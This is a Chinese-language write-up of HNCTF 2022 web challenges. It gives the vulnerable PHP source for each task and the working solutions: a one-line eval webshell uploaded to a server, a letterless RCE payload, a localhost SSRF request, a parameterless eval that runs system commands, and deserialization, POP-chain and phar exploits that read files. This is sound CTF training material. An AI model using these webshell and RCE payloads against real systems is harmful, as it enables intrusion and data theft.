[HNCTF 2022] web 刷题记录

---

[HNCTF 2022 Week1]easy_html

打开题目提示cookie有线索

访问一下url
发现要求我们输入手机号，可是只能输10位
F12查看，修改一下maxlength的值为11位
然后随便输入11位，即可得到flag

[HNCTF 2022 Week1]easy_upload

创建1.php，写入一句话木马

<?php @eval($_POST['shell']);?>

上传成功
访问./upload/1.php，然后ls看一下目录
得到flag

[HNCTF 2022 Week1]Interesting_http

根据提示，传一个我们想要的，那就传flag咯
然后是修改cookie为admin，添加X-Forwarded-For:127.0.0.1
然后让我们选择要哪个，这里发现l变成了大写的i（一直没发现。。）
得到flag

[HNCTF 2022 Week1]Challenge__rce

打开题目，F12提示上传参数hint，得到源码

<?php
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
    $rce = $_POST['rce'];
    if (strlen($rce) <= 120) {
        if (is_string($rce)) {
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
                eval($rce);
            } else {
                echo("Are you hack me?");
            }
        } else {
            echo "I want string!";
        }
    } else {
        echo "too long!";
    }
} 

分析一下，这里看完滤条件，考点就是无字母rce，同时禁用了^和%，那么不能用取反和异或。
这里采用的是自增构造；由于长度限制小于120
payload

rce=$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);

//长度118    等效于$_GET[1]($_GET[2])

hint随便一个值，然后1和2对应函数和执行命令

得到flag

[HNCTF 2022 WEEK2]ez_SSTI

先试试

?name={{7*7}}

发现成功，猜测是Jinja2

[HNCTF 2022 WEEK2]ez_ssrf

源代码

 <?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];

$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);
    while(!feof($data))
    {
        echo fgets($fp,128);
    }
    fclose($fp);
} 

简单分析一下，fsockopen能够使用socket与服务器进行tcp连接，并传输数据，host、port和数据都能定义，存在SSRF
扫一下目录，发现有./flag.php
提示本地127.0.0.1和80端口
这里应该是从index.php传参，ssrf然后访问到flag.php
将data值base64编码一下

payload

?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

得到flag

[HNCTF 2022 WEEK2]Canyource

源代码

 <?php
highlight_file(__FILE__);
if(isset($_GET['code'])&&!preg_match('/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['code'])){
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);}
else
    die('nonono');}
else
    echo('please input code');
?>

分析一下，可以发现是无参rce，同时过滤的不算严重。
我们利用无参函数构造

payload

?code=eval(end(current(get_defined_vars())));&a=system("cat flag.php");

得到flag

[HNCTF 2022 WEEK2]easy_unser

源码

<?php 
    include 'f14g.php';
    error_reporting(0);

    highlight_file(__FILE__);

    class body{

    private $want,$todonothing = "i can't get you want,But you can tell me before I wake up and change my mind";

    public function  __construct($want){
        $About_me = "When the object is created,I will be called";
        if($want !== " ") $this->want = $want;
        else $this->want = $this->todonothing;
    }
    function __wakeup(){
        $About_me = "When the object is unserialized,I will be called";
        $but = "I can CHANGE you";
        $this-> want = $but;
        echo "C1ybaby!";
        
    }
    function __destruct(){
        $About_me = "I'm the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR is_file($this->want)){
            die("You want my heart?No way!\n");
        }else{
            echo "You got it!";
            highlight_file($this->want);
            }
    }
}

    class unserializeorder{
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";
        function __sleep(){
            $About_me = "When the object is serialized,I will be called";
            echo "We Come To HNCTF,Enjoy the ser14l1zti0n <BR>";
        }
        function __toString(){
            $About_me = "When the object is used as a string,I will be called";
            return $this->CORE;
        }
    }
    
    $obj = new unserializeorder();
    echo $obj;
    $obj = serialize($obj);
    

    if (isset($_GET['ywant']))
    {
        $ywant = @unserialize(@$_GET['ywant']);
        echo $ywant;
    }
?> 

简单分析一下，我们可以修改属性数目绕过_wakeup方法，然后 __construct进行弱比较，利用若有一方为数字，另一方为字符串或空或null，均会先将非数字一方转化为0，再做比较，所以可以绕过。最后是 __destruct的if语句。

我们的思路是利用高光函数highlight_file()结合php伪协议读取本地文件
exp

<?php 
class body{
    private $want = "php://filter/resource=f14g.php";
    private $todonothing = "123456";
}

$a=new body();
echo urlencode(serialize($a));
?>

得到字符串

O%3A4%3A%22body%22%3A2%3A%7Bs%3A10%3A%22%00body%00want%22%3Bs%3A30%3A%22php%3A%2F%2Ffilter%2Fresource%3Df14g.php%22%3Bs%3A17%3A%22%00body%00todonothing%22%3Bs%3A6%3A%22123456%22%3B%7D

注意要将属性数目加一
上传得到flag

[HNCTF 2022 WEEK4]pop子和pipi美

源码

<?php
error_reporting(0);
//flag is in f14g.php
class Popuko {
    private $No_893;
    public function POP_TEAM_EPIC(){
        $WEBSITE  = "MANGA LIFE WIN";
    }
    public function __invoke(){
        $this->append($this->No_893);
    }
    public function append($anti_takeshobo){
        include($anti_takeshobo);
    }
}

class Pipimi{
    
    public $pipi;
    public function PIPIPMI(){
        $h = "超喜欢POP子ww,你也一样对吧(举刀)";
    }
    public function __construct(){
        echo "Pipi美永远不会生气ww";
        $this->pipi = array();
    }

    public function __get($corepop){
        $function = $this->p;
        return $function();
    }
}
class Goodsisters{

    public function PopukoPipimi(){
        $is = "Good sisters";
    }

    public $kiminonawa,$str;

    public function __construct($file='index.php'){
        $this->kiminonawa = $file;
        echo 'Welcome to HNCTF2022 ,';
        echo 'This is '.$this->kiminonawa."<br>";
    }
    public function __toString(){
        return $this->str->kiminonawa;
    }

    public function __wakeup(){
        if(preg_match("/popzi|flag|cha|https|http|file|dict|ftp|pipimei|gopher|\.\./i", $this->kiminonawa)) {
            echo "仲良ピース!";
            $this->kiminonawa = "index.php";
        }
    }
}

if(isset($_GET['pop'])) @unserialize($_GET['pop']);  

else{
    $a=new Goodsisters;
    if(isset($_GET['pop_EP']) && $_GET['pop_EP'] == "ep683045"){
        highlight_file(__FILE__);
        echo '欸嘿,你也喜欢pop子~对吧ww';
    }
} 

简单分析一下，利用点就是伪协议读取文件
pop链子

Goodsisters.__construct() --> Goodsisters.__toString() --> Pipimi.__get() --> Popuko.__invoke() --> Popuko.append()

exp

<?php
class Popuko {
    private $No_893;
    public function __construct(){
        $this->No_893 ="php://filter/read/convert.base64-encode/resource=f14g.php";
    }
}

class Pipimi{
    public $pipi;

}
class Goodsisters{
    public $kiminonawa,$str;

}

$a=new Goodsisters();
$b=new Pipimi();
$c=new Popuko();
$a->kiminonawa=$a;
$a->str=$b;
$b->p=$c;
echo urlencode(serialize($a));
?>

注：这里由于$No_893属性为private，所以我们可以用construct去赋值；然后就是payload里的$a->kiminonawa=$a要注意一下。

得到flag

[HNCTF 2022 WEEK3]ez_phar

考点：phar反序列化

源码

<?php
show_source(__FILE__);
class Flag{
    public $code;
    public function __destruct(){
    // TODO: Implement __destruct() method.
        eval($this->code);
    }
}
$filename = $_GET['filename'];
file_exists($filename);
?>

可以看到有file_exists()函数，可以利用phar反序列化

exp如下

<?php
class Flag{
    public $code;
}

$a=new Flag();
$a->code="system('cat /ffflllaaaggg');";
$phar = new Phar("hacker.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

然后访问./upload.php，发现只能上传jpg，修改下后缀
上传成功后，phar伪协议读取，得到flag